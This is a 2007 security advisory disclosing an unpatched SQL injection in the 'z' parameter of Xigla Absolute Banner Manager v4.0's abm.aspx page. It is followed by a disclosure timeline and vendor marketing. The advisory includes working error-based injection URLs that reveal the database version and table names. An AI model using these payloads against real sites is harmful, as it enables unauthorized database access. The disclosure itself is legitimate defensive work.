HackerSafe Labs - Security Advisory 

http://www.hackersafelabs.com/ <http://www.hackersafelabs.com/>  
  
Date: 12/06/2007
Vendor: http://www.xigla.com <http://www.xigla.com>  
Package: Xigla Absolute Banner Manager 
Versions: v4.0 
Credit: Joseph Pierini - HackerSafe Labs

Risk: 
Related Exploit Range: Remote 
Attack Complexity: Medium 
Level of Authentication Needed: Not Required 
Confidentiality Impact: Major 
Integrity Impact: Major 
Availability Impact: Major 

Overview: 
Absolute Banner Manager .NET is a feature packed Ad Tracking and Banner
Management software specially developed for the webmaster looking for a
scalable, flexible and reliable Banner Ad Serving front-end tool. 

Vulnerabilities: 
A SQL injection exists in the Windows version of the Xigla Absolute
Banner Manager application. 

SQL Injection Page: "abm.aspx" 
SQL Injection Parameter: "z=" 

Examples: 

http://www.domainname.com/absolutebm/abm.aspx?z=@@version
<http://www.domainname.com/absolutebm/abm.aspx?z=@@version>  
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 -
8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003
Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790:
Service Pack 1) ' to a column of data type int. 
http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(in
t,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20whe
re%20xtype=char(85)))
<http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(i
nt,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20wh
ere%20xtype=char(85)))> - 
Syntax error converting the varchar value 'dtproperties' to a column of
data type int. 

Resolution Timeline: 

Vendor Notification: October 29, 2007 : 'info@xigla.com'
'security@xigla.com'
Vendor Response: None 
Vendor Fix: None 
Public release of advisory: December 6, 2007 

ScanAlert Responsible Disclosure Policy

 

ScanAlert believes in the responsible disclosure of vulnerability
information with a coordinated release with the vendor where possible.
Except where active and/or trivial exploitation of the vulnerability is
present, ScanAlert believes it is in the best interest of the community
when the vendor participates in the process of disclosure and has
sufficient time to respond effectively. If ScanAlert exhausts all
reasonable means in order to contact a vendor, then ScanAlert may issue
a public advisory disclosing its findings 15 business days after the
initial contact.

ScanAlert's mission is to make the web safe from hackers. 

We make web sites secure from hackers and certify it to their customers
via 
our patent pending HACKER SAFE(r) security certification technology. Our
daily 
security audits and real-time certification enables consumers to know 
whether the sites where they shop are taking the necessary steps to 
safeguard their personal information from hackers. By alleviating
consumers' 
fears of identity theft and credit card fraud, online merchants who earn

HACKER SAFE certification consistently see substantial increases in
online 
transactions 

Joseph Pierini, CISSP | Director, Enterprise Services 
ScanAlert ( www.scanalert.com) <http://www.scanalert.com)>  
labs@hackersafe.com <mailto:labs@hackersafe.com>  
877-302-9965 ext 1185